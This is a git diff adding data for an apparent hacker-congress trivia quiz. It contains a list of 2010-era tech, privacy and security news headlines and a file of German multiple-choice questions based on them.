+167Youtube streamt uber zwei Milliarden Videoclips pro Tag, 5 Jahre alt
+166CCC | Prix Ars Electronica 2010
+165US military chokes on stream from robots' fat pipes The Register
+164Infosecurity (UK) - Facebook identifies hacker selling 1.5 million accounts
+163Google Street View logs WiFi networks, Mac addresses The Register
+162Google abandons smart phone Web store - The Globe and Mail
+161Wikileaks founder told his passport will be cancelled | TG Daily
+160Pirate Bay ISP hit with German injunction; must stop hosting
+159Gigapan: Das grote Foto der Welt hat 45 Gigapixel
+158Denic: Probleme mit den .de-Rootservern?
+157Air Force suffers collateral damage from PS3 firmware update
+156Hartz IV: Kein Geld fur Computer | tagesschau.de
+155heise online - BGH schrankt Folgen der Storerhaftung fur WLAN-Betreiber ein
+154Adobe's new Flash DRM comes with selective output control
+153The Humble Indie Bundle (pay what you want for five awesome indie games)
+152Amazon Spying On Your Ebook Highlighting | Techdirt
+151Privacy watchdog looks into NHS data breach | Security Threats | ZDNet UK
+149'Zombie' satellite runs amok in Earth's orbit - CSMonitor.com
+1487Gbps WiFi Wireless Networking Hardware Could Launch in 2010 − ISPreview UK
+147Twitter confirms awkward 'auto-follow' bug | The Social - CNET News
+146heise online - Fremde MobileMails bei Vodafone einsehbar
+145heise online - Hohes Bugeld gegen Postbank in Finanzberater-Affare
+144WordPress Hacked with Zettapetta on DreamHost | WPSecurityLock
+143heise online - US-Prasident sieht iPad, Xbox und PlayStation skeptisch
+142heise online - Facebook verstarkt Lobby-Truppe
+141miculog Bundnis 90/Die Grunen in Sachsen fordern einen Umstieg auf GNU/Linux und freie Software Auswertung der groen FLOSS-Anfrage
+139SUP MUA
+138Chinese Rules Said to Threaten Proprietary Information - NYTimes.com
+137Hacked US Treasury websites serve visitors malware The Register
+136Facebook closes serious security hole - The H Security: News and Features
+135Love Bug 10 years later: I love you - now open this email - Security
+134New attack bypasses virtually all AV protection The Register
+133Rudd retreats on web filter legislation | The Australian
+132FCC gives Hollywood control over your home theater
+131Vorratsdatenspeicherung: Kein Einfluss auf die Aufklarungsrate von Verbrechen - Golem.de
+130Naked scanner reveals airport screener's tiny penis, sparks fist-fight with fellow officers
+129Wir in NRW Das Blog
+128virtual Desktop Patentklage gegen Red Hat und Novell gescheitert
+127Neues Datenleck bei SchulerVZ : netzpolitik.org
+126GoogleSharing :: A Special Kind Of Proxy
+125MATLAB Can't Manipulate 64-Bit Integers
+124Schneier on Security: Fun with Secret Questions
+123EU zahlt 300.000 Euro fur Pro-Netzsperren-Lobbying
+122the Month of PHP Security
+121Facebooks Eroding Privacy Policy: A Timeline | Electronic Frontier Foundation
+120heise online - Sich selbst kompilierende Low Level Virtual Machine
+119heise online - Indiens E-Voting-Gerate sind angreifbar
+118Music industry spokesman loves child porn
+117no more floppy
+116Reconstructing Users' Web Histories From Personalized Search Results
+115gPodder.net
+114heise online - Verizon: Full Disclosure nutzt nur selbstverliebten "Pimps"
+113Nina Paley passes Netflix DRM and thousands of dollars
+112Facebook Retroactively Makes More User Data Public
+111German appeal court upholds Microsoft FAT patent - The H Open Source: News and Features
+110"Universitat sperrt iPads wegen fehlerhaftem DHCP"
+109The keys to my heart are on my foot
+108School secretly snapped 1000s of students at home
+107Printing from an iPad
+106Innenminister stellt loschen statt sperren in Frage : netzpolitik.org
+105Hitler Is Very Upset That Constantin Film Is Taking Down Hitler Parodies
+104This Is Apple's Next iPhone - Iphone 4 - Gizmodo
+103Palm Pwned: Researchers Hack WebOS With Text Messages | threatpost
+102How Dirty MP3 Files Are A Back Door Into Cloud DRM
+101Feds drop bid for warrantless access to Yahoo! mail The Register
+100Bushs Illegal Wiretapping Tab: $612,000
+99heise resale - Urheberrechtsabgabe fur USB-Sticks und Speicherkarten festgezurrt
+98Nestle-killer-kampagne
+97Video-game shoppers surrender their immortal souls
+96Big Content's dystopian wish-list for the US gov't: spyware, censorship, physical searches and SWAT teams
+95Mark Fiore can win a Pulitzer Prize, but he can’t get his iPhone cartoon app past Apple’s satire police Nieman Journalism Lab
+94Labor group: Chinese teens 'like prisoners' in Microsoft tech factory
+93heise online - Facebook: Lieber Angreifer jagen als Sicherheitslucken schlieen
+92Palm Pre als mobiler WLAN-Access-Point
+91Apache Foundation Hit by Targeted XSS Attack | threatpost
+90We Pad even runs Windows
+89NASA hacker's mother stands for Parliament
+88heise online - Datenpanne fuhrt zur ungenehmigten Organentnahme in Grobritannien
+87Interesting times for Video on the Web - Google Open Source Blog
+86Spy Network Pilfered Classified Docs From Indian Government and Others | Threat Level | Wired.com
+85Romania Swoops In on 70 Cybertheft Suspects | Threat Level | Wired.com
+84NYT ethicist: OK to pirate ebooks once you've bought the hardcover
+83Bank insider charged over ATM malware scam The Register
+82Teen Sues Mom for Hacking Facebook Account - PCWorld
+81Location der geblockten Seiten in Danemark
+80OtherOS on PS3 3.21 reactivated
+79Millions will have to buy routers to beat hackers - Times Online
+78Cyber warrior Camps for Recruitment
+77FOSS Patents: IBM breaks the taboo and betrays its promise to the FOSS community
+76heise online - Vorlaufiges Aus fur E-Voting in Osterreich
+75MS XML Patent bestatigt
+74iBooks naughty word filter doesn't let you say "sperm"
+73Facebook-Fehler fuhrte zur Veroffentlichung aller E-Mail-Adressen
+72heise online - Webseite des Umweltbundesamtes verteilte Trojaner
+71SEX.com filed bankruptcy
+70heise online - China: Yahoo-Mailkonten auslandischer Journalisten angegriffen
+69heise online - PDF-Exploit funktioniert ohne konkrete Sicherheitslucke
+68Poland Abandons Internet Censorship Plans - New Europe - WSJ
+67Mitmach-Aktion: Bei der Schufa&Co (kostenlos) Auskunft verlangen!
+66Israel: Anonymitat im Internet wird zum Grundrecht
+65gulli.com - news - Berlin: Staatsanwalt will VDS-Daten missbrauchen
+64gulli.com - news - TrueCrypt geknackt - oder auch nicht
+63Apple fixt mal eben 88 Sicherheitslucken
+6253 cars towed away
+61SCO loses again: jury says Novell owns UNIX SVRX copyrights
+60Chinese City is World's Hacking Capital
+59Frenchman Arrested for Hacking Twitter
+58DNS Error Extends Great Firewall of China
+57Security Flaws Found in Smart Meters
+56heise online - Italien: Amtliche Praferenz fur Open Source ist rechtmaig
+55Solaris only 90 days trial
+54Umfang der Zensur von Suchergebnissen auf Google.de - SISTRIX Suchmaschinen- & SEO-Blog
+53DARPA Bounces Smart Radar Off Buildings To Track Individual Urban Vehicles From the Sky | Popular Science
+52Ukrainian hacker liable in SEC insider trading case
+51Google, Microsoft to team up on privacy push launching tomorrow
+50heise online - Sony sperrt Linux von der PS3 aus
+49Sachsische Zeitung [online] - Sachsen: Sachsens Polizeidrohnen droht die Bruchlandung
+48Kit attacks Microsoft keyboards (and a whole lot more) The Register
+478 Jahre Hausdurchsuchung dank Datenbankfehler
+46Der erste Flughafen-Security-Fuzzy ist beim Bodyscanner-Spannen erwischt worden
+45Sony accuses Beyonce of piracy for putting her videos on YouTube
+44Piracy up in France after tough three-strikes law passed
+43heise online - EFF zweifelt an Abhorsicherheit von SSL
+42Spam kommt gut an
+41TJX Accomplice Gets Probation for Selling Browser Exploit | Threat Level | Wired.com
+40Israel aborts raid after soldier posts details on Facebook
+39Cybercrime losses almost double The Register
+38Update: Security industry faces attacks it cannot stop
+37Every citizen to have personal webpage - Telegraph
+361968 ASCII Animation from Russia
+35Slashdot IT Story | The Biggest Cloud Providers Are Botnets
+34heise online - Mehr als 20.000 Mitbeschwerden gegen ELENA
+33heise online - Firefox 3.6.2 schliet schwerwiegende Sicherheitslucke
+32Nottingham cops declare war on kids - Boing Boing
+31Emporte Pakistaner: Freundschaftsreise in die USA endet mit Nacktscanner-Eklat - SPIEGEL ONLINE - Nachrichten - Politik
+30Former TSA analyst charged with computer tampering - TSA, terrorism, tampering, analyst - Good Gear Guide
+29Energizer battery charger contains backdoor | Zero Day + | ZDNet.com
+28A Tool to Deceive and Slaughter
+27heise online - SCO vs. Linux: Die Jury ist aufgeklart
+26ff flaw and browser roundup
+25Google about to pull the plug in China
+24Petition: Franziska Heine Briefmarke
+23Hackable Linux clamshell goes on sale for $99
+22Boni fur KK-Manager
+21Apple will not replace ipad batteries - The Inquirer
+20Petition gegen ELENA vom Foebud
+19eBook reading application
+18Apple's patent attack [LWN.net]
+17Yahoo patents News Feeds
+16heise online - Merkelphones kommen sich naher
+15Wikileaks im Visier von US-Militargeheimdienst
+14Microsoft Was Behind Google Complaints To EC | eWEEK Europe UK
+13Microsoft: Don't press F1 key in Windows XP
+12Cryptome Paypal account blocked
+11Facebook founder Mark Zuckerberg of hacking into the email accounts of rivals and journalists
+10322Tbit/sec Router available cisco
+9ARM based iPad clones on the way
+8Filter company doesn't belive in filtering
+725 years anniversary of 1st .com address
+6Pirate Bay legal action dropped in Norway - Legislation/regulation/privacy - ComputerworldUK
+5heise online - US-Strafverfolger nutzen soziale Netzwerke fur verdeckte Ermittlungen
+4Mac OS X: "geringeres Risiko, aber letztlich unsicherer"
+3Hacker Disables More Than 100 Cars Remotely | Threat Level | Wired.com
+2Video fur Wikipedia
+ + + diff --git a/data.27c3/questions.txt b/data.27c3/questions.txt new file mode 100644 index 0000000..89bdc9b --- /dev/null +++ b/data.27c3/questions.txt @@ -0,0 +1,41 @@ +50;2;3;Wieviele Autos wurden nach einem Einbruch in die Webseite eines Auto-Leasingunternehmens in Austin/Texas abgeschaltet?;<50;ca. 100;ca. 500;ca. 10000 +100;2;21;Was macht man, wenn die iPad Batterie kaputt ist?;Neues iPad kaufen;Gebrauchtes iPad kaufen;beim Uhrmacher tauschen lassen;selbst tauschen +200;3;10;Was ist die Datengeschwindigkeit der schnellsten kommerziellen Router?;5Tbps;23Tbs;322Tbps;512Tbps +1000;4;35;Wer betreibt die größte Cloud Infrastruktur?;Google;Facebook;Amazon;Botnets +2000;3;36;In welchem Jahr wurde die erste ascii-Art Animation geschaffen?;1976;1982;1968;1954;3.flv + +50;1;46;Auf welchem Flughafen hat sich ein Mitarbeiter von einer Mitarbeiterin einen Body-Scan gezogen weil er: "I love those gigantic ts."?;London;Liverpool;Miami;Manchester +100;3;66;In welchem Land ist Anonymität im Netz ein Grundrecht?;Finnland;USA;Israel;Kongo +200;3;88;Eine Datenpanne in Englands Sozialregister führte zu folgemdem:;falsche Beisetzung;fälschlich Angehörige informiert;fälschliche Organentnahme;Inkraftsetzen des Testaments +1000;2;123;So viel zahlte die EU an Jugendschutzorganisationen für Pro-Netzsperren Lobbying.;100k€;300k€;600k€;1Mio.€ +2000;4;135;Wie viele Computer infizierte der 10 Jahre alte I love you Wurm?;1 Mio;5 Mio;23 Mio;42 Mio;135.jpg + +50;3;163;Diese Firma löste eine umfassende Diskussion aus nachdem bekannt wurde, dass sie offene WLANs für ein paar ms scannt?;Apple;Vodafone;Google;Microsoft +100;166;Welcher Verein erhielt 2010 den Prix Ars Electronica Preis?;Spider-Man 3;CCC;Jamendo;BSI; +200;4;167;So viele Videoclips streamt YouTube pro Tag;20 Mio;200 Mio; 800 Mio;2 Mrd; +1000;4;108;Wozu nutzten Schüler in Pennsylvania eine Sicherheitslücke in der Remote-Admin Software ihrer Schul PCs?;Zensuren ändern;Freistunden schalten;Bombenalarm auslösen;Kamera Spyware abschalten +2000;2;180;Welche Firma verteilte auf der IT Sicherheitskonferenz "Asia Pacific Information Security Conference" infizierte USB-Sticks?;Cisco;IBM;Apple;Microsoft + +50;3;214;Diese Programmiersprache hat knapp 1/4 aller Einträge beim NIST und ist 15 Jahre alt.;Perl;C;PHP;C#/.NET +100;3;215;Welche Fa. hat die Ablöse für Mitarbeiter, welche Selbstmord begingen gestoppt um die Selbstmordrate zu senken?;France Telekom;DTAG;Foxconn;IBM +200;1;293;In welchem Land sind Bodyscanner verboten?;Saudi Arabien;USA;Deutschland;Israel +1000;2;3;307;Welche These stammt nicht aus dem Zeitweise Blog? 1) Das Netz ist größer als du dir vorstellen kannst. 2) Das Netz sagt: "I can haz cheeseburger." 3) Der freie Bürger zeigt sein Gesicht, nennt seinen Namen, hat eine Adresse. Gleichzeitig sind wir es gewohnt, im Alltag grundsätzlich unbeobachtet zu handeln. Beides muss auch im Internet normal bleiben." 4) Denn wir sind das Netz.;1;2;3;4 2000;307.jpg +2000;2;309;Wozu werden in UK die Anti-Terror Gesetzte genutzt?;Terroristen abwehren;Mülltonnen bei Schulschwänzung durchsuchen;Videoüberwachung;die Welt sicherer machen + +50;1;245;In welchem öffentlichen Raum sind Computer verboten? Tablets sind neuerdings erlaubt.;Bundestag;Bundesrat;Bayr. Landtag;CCC-Events 100;3;407;Dieser ISP hostet Wikileaks Server;DTAG;Piraten Partei Schweden;1&1;TISP +100;4;428;Wo werden in den USA als nächstes Nacktscanner eingesetzt?;Schulen;öffentl. Behörden;Hochhäuser;Straßen +200;1;283;Wer verlor im Juli 4 Mio Nutzerdatensätze?;Pirate Bay;Facebook;Forsquare;Verizon(iPAD) +1000;3;258;Wir wurde Lonnie Tinsley (86-jährige bettlägerische Omi aus Oklahoma) gezwungen ihre Medizin zu nehmen?;Spritze;vorgehaltene Waffe;Taser;Internetverbot +2000;2;252;Wieviele Data Center hat die US Regierung?;550;1100;2200;4400 + +50;1;316;In welchem Land werden Webseiten erst ab 22 Uhr geöffnet um über die Franz. Revolution zu berichten?;Deutschland;Frankreich;Abu Dhabi;China +100;2;459;Welcher Artikel wurde nicht zur Löschung vorgeschlagen?;Club Mate;Datenspuren;Protest gegen Stuttgart 21;Wikipedia:Qualitätsoffensive;459.jpg +200;2;326;Aufgrund welchen Patents wurden 36 Firmen vom Marshall Patent Troll verklagt?;Spyware;Spamfiltern;OS Shutdown;VoIP +1000;1;327;Welche Behörde wurde nervös, als sie Childporn-Konsumenten in ihren Reihen fanden?;FBI;Innenministerium;FSB;MI6 +2000;4;341;Eine Ministerin aus welchem Land hat ein Striptease-Bild auf Facebook veröffentlicht?;Ukraine;Äthopien;Bulgarien;Georgien;341.jpg + +50;4;356;Wie lautet das Motto des diesjährigen Congresses?;red pill provider since 1984;LHC - Large Hacker Collider;Nicht mehr vertrauenswürdig;Wir kommen in Frieden +100;4;392;Wer will Streetview für virtuelle Streifenfahrten nutzen?;Polizeigewerkschaft;Innenministerium;Merkel;privater Wachdienst +200;1;360;Welches Land macht WL Konkurenz und veröffentlichte die Namen ihrer Spione?;Tschechien;Serbien;Albanien;Norwegen +1000;3;376;Aus welcher Stadt kam das Webseitendefacement in Buchenwald?;Rathen;Chicago;Pirna;Hof +2000;2;390;Die Tour welcher Band wurde über einen gehackten Twitter-Account gecanceled?;KISS;Rolling Stones;Guns'n'Roses;AC/DC diff --git a/data.27c3/tsa2691.jpg b/data.27c3/tsa2691.jpg new file mode 100644 index 0000000..99b847c Binary files /dev/null and b/data.27c3/tsa2691.jpg differ diff --git a/data.27c3/xray-car.jpg b/data.27c3/xray-car.jpg new file mode 100644 index 0000000..662f97d Binary files /dev/null and b/data.27c3/xray-car.jpg differ